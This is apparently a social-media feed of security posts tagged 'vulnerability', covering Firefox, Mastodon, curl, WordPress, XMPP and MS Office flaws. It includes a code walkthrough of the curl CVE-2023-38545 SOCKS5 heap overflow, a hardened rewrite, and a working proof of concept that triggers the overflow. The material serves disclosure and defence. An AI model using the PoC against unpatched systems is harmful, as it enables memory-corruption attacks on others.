Items tagged with: vulnerability
Mozilla Firefox exploited zero-day: Security Advisory 2024-51 Security Vulnerability fixed in Firefox 131.0.2, Firefox ESR 128.3.1, Firefox ESR 115.16.1
CVE-2024-9680 (9.8 critical) Use-after-free in Animation timeline
An attacker was able to achieve code execution in the content process by exploiting a use-after-free in Animation timelines. We have had reports of this vulnerability being exploited in the wild.
See related @BleepingComputer reporting: Mozilla fixes Firefox zero-day actively exploited in attacks
The Canadian Centre for Cyber Security (CCCS) has a useless Mozilla security advisory (AV24-576) which doesn't indicate that this is an actively exploited zero-day. What's the point in an advisory when it doesn't provide the biz?
#zeroday #vulnerability #firefox #mozilla #cve #CVE_2024_9680
OK #vulnerability nerds
With the current state of #NVD, there is a need to fill the gap right now. It's expected that anything new happening is going to take months or years, which is longer than the world can wait
Anchore has an open source project we're currently calling "NVD Data Overrides" (naming things is hard)
github.com/anchore/nvd-data-ov…
We're working on adding the same type of thing NVD used to do to the #CVE data. The data is licensed CC0, anyone can use it for anything.
The data repo currently has over 500 enriched IDs (there's a lot more to do, but this is how it starts).
If you're interested in this sort of thing please come help. The vulnerability world is now so big we need to cooperate the same way open source works, nobody can do this alone anymore
GitHub - anchore/nvd-data-overrides (link preview, GitHub)
"Mastodon: theft of arbitrary identities in the federated microblogging service" 😬
Versions 3.5.17, 4.0.13, 4.1.13 and 4.2.5 fix the vulnerability. 👇
heise.de/news/Mastodon-Diebsta…
#mastodon #security #vulnerability #schwachstelle #sicherheit
Mastodon: theft of arbitrary identities in the federated microblogging service
In a terse security advisory the developers drop a bombshell: attackers can take over and forge any account. Dr. Christopher Kunz (heise online)
curl is now a CVE Numbering Authority (CNA) assigning CVE IDs for all products made and managed by the curl project. This includes curl, libcurl, and trurl.
cve.org/Media/News/item/news/2…
#CVE #CNA #VulnerabilityManagement #Vulnerability #Cybersecurity
Critical flaw found in WordPress plugin used on over 300,000 websites.
Read more in my article on the Tripwire blog: tripwire.com/state-of-security…
#cybersecurity #wordpress #vulnerability
Critical flaw found in WordPress plugin used on over 300,000 websites
A WordPress plugin used on over 300,000 websites has been found to contain vulnerabilities that could allow hackers to seize control. (www.tripwire.com)
curl disclosed on HackerOne: CVE-2023-46218: cookie mixed case PSL...
Summary: libcurl fails to normalize the `hostname` and `cookie_domain` parameters passed to `psl_is_cookie_domain_acceptable` function. As a result a malicious site can set a super cookie if the... (HackerOne)
#XSF Announcement
Recently an incident involving a so-called #man_in_the_middle attack happened to an #XMPP #server.
To reduce the risk of such attacks in the future, an early-stage service called CertWatch has been published by our Community: certwatch.xmpp.net/
Many thanks to Stephen P. Weber (@singpolyma)!
Read two related blog posts:
blog.jmp.chat/b/certwatch/cert…
snikket.org/blog/on-the-jabber…
#Jabber #mitm #security #vulnerability #machine_in_the_middle #chat
On the jabber.ru MITM attack
Reports of a possible recent interception of the public XMPP service jabber.ru have raised a lot of questions for people about how the attack happened, and whether it could affect them too. We have some answers. (snikket.org)
Why did the #curl #CVE202338545 vulnerability hide from static analysis tools?
The main reason for this is the type of code structure in question. In general, state engines are quite difficult for static analysis tools, since, as the name implies, the state of the various variables depends on runtime state changes.
The code attempts to determine whether it is safe to use the provided host name for remote resolution. Since the code does not function correctly with host names longer than 255 characters, it falls back to using “socks5://” protocol (local name resolution) if the host name is longer. When the name is too long, the code forces “local name resolution” by setting “socks5_resolve_local” variable to TRUE.
Unfortunately this “socks5_resolve_local” variable isn’t stored in the “socks_state” structure as it should have been. For each state “step” the initial value for the variable is determined with:
  bool socks5_resolve_local =
    (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;
The INIT state then sets "socks5_resolve_local" to TRUE if the host name is too long:
  /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
  if(!socks5_resolve_local && hostname_len > 255) {
    infof(data, "SOCKS5: server resolving disabled for hostnames of "
          "length > 255 [actual len=%zu]", hostname_len);
    socks5_resolve_local = TRUE;
  }
But this check is *only* done in INIT state. When the state is anything else, the initial value is used.
Now, the later CONNECT_RESOLVE_REMOTE state checks whether remote name resolution should be used or not:
  if(!socks5_resolve_local) {
    if (… sx->hostname is literal IPv6 address …) {
      … use ipv6 address direct …
    }
    else if (… sx->hostname is literal IPv4 address …) {
      … use ipv4 address direct …
    }
    else {
      socksreq[len++] = 3;
      socksreq[len++] = (char) hostname_len; /* one byte address length */
      memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
      len += hostname_len;
    }
  }
As the "socks5_resolve_local" flag is FALSE for the excessively long hostname, the "socksreq" heap buffer will be overflowed by the memcpy call.
There is no obvious way for the static analysis tools to determine that “socks5_resolve_local” might be set incorrectly for some of the states. Runtime #fuzzing will find this flaw quite easily, but unfortunately no fuzzing was performed for this specific functionality.
#vulnerability #staticanalysis #infosec
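A hardened shape for the two states discussed above, as an added example that is not curl's own code: the resolve flag lives in a socks_state struct that INIT fills once, over-long names are refused instead of being silently redirected to local resolution, and the state that writes the packet re-checks the length against both the 255-byte protocol limit and the destination buffer before its memcpy. The struct, function and result names are assumptions made for this example.

```c
#include <stdint.h>
#include <string.h>
/* Per-connection state: the flag lives here, not in a local recomputed every
 * state step, so later states see what INIT decided. */
struct socks_state { const char *hostname; size_t hostname_len; int resolve_local; };
enum socks_result { SOCKS_OK = 0, SOCKS_ERR_LONG_HOSTNAME = 1 };
/* INIT: RFC 1928 caps the domain-name field at 255 bytes; refuse longer names
 * instead of silently switching to local resolution. */
enum socks_result socks5_init(struct socks_state *sx, const char *hostname, int proxy_resolves)
{
    sx->hostname = hostname;
    sx->hostname_len = strlen(hostname);
    sx->resolve_local = !proxy_resolves;
    if(!sx->resolve_local && sx->hostname_len > 255)
        return SOCKS_ERR_LONG_HOSTNAME;
    return SOCKS_OK;
}
/* CONNECT_RESOLVE_REMOTE: VER, CMD, RSV, ATYP=3, len, name, port. The copy is checked
 * against the protocol limit and the buffer, so a wrong flag cannot overflow. -1 on error. */
int socks5_build_connect(const struct socks_state *sx, unsigned char *socksreq, size_t cap, uint16_t port)
{
    size_t len = 0;
    if(sx->resolve_local || sx->hostname_len > 255) return -1;
    if(cap < 5 + sx->hostname_len + 2) return -1;
    socksreq[len++] = 5; socksreq[len++] = 1; socksreq[len++] = 0; socksreq[len++] = 3;
    socksreq[len++] = (unsigned char)sx->hostname_len;
    memcpy(&socksreq[len], sx->hostname, sx->hostname_len);
    len += sx->hostname_len;
    socksreq[len++] = (unsigned char)(port >> 8);
    socksreq[len++] = (unsigned char)(port & 0xff);
    return (int)len;
}
/* Constructed checks: a 300-byte name is rejected in INIT; a state smuggled past
 * INIT is still refused by the builder; "example.com" yields 5 + 11 + 2 bytes. */
int demo_long_hostname(void) {
    char name[301]; struct socks_state sx;
    memset(name, 'A', 300); name[300] = '\0';
    return socks5_init(&sx, name, 1);
}
int demo_builder_refuses_long(void) {
    unsigned char req[600]; struct socks_state sx = { "x", 300, 0 };
    return socks5_build_connect(&sx, req, sizeof(req), 443);
}
int demo_short_hostname(void) {
    unsigned char req[600]; struct socks_state sx;
    if(socks5_init(&sx, "example.com", 1) != SOCKS_OK) return -1;
    return socks5_build_connect(&sx, req, sizeof(req), 443);
}
```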
Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:
gcc -xc -fsanitize=address - -lcurl <<EOF
#include <curl/curl.h>
#include <string.h>
int main(void)
{
  CURL *curl = curl_easy_init();
  if(curl) {
    char url[32768];
    memcpy(url, "https://", 8);
    memset(url + 8, 'A', sizeof(url) - 8 - 1);
    url[sizeof(url) - 1] = '\0';
    curl_easy_setopt(curl, CURLOPT_URL, url);
    (void)curl_easy_perform(curl);
    curl_easy_cleanup(curl);
  }
  return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out
Some comments:
• Application must use a socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly setting the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht… for more details.
Here's a stark reminder that any #backdoor is a #vulnerability:
"China-based hackers used a stolen sign-in key" to hack into US government's #Microsoft email accounts.
That's why we at Tutanota fight for strong encryption - without any backdoor. 🔒
Hey people!
If you use #Microsoft #Office be extra careful when opening documents or files from unknown sources. On May 31st a #vulnerability was disclosed that allows an attacker to execute code through MS Office via maliciously prepared documents. It's best to open only stuff which comes from people you know or implement the published mitigation strategies:
🇬🇧 EN:
msrc-blog.microsoft.com/2022/0…
🇩🇪 GER:
heise.de/news/Zero-Day-Luecke-…
Currently I am not aware of a security update, so be careful.
Zero-day vulnerability in MS Office: Microsoft issues recommendations
Microsoft issues recommendations for action against the zero-day vulnerability in Office. Attackers could abuse it to inject malicious code. Dirk Knop (heise online)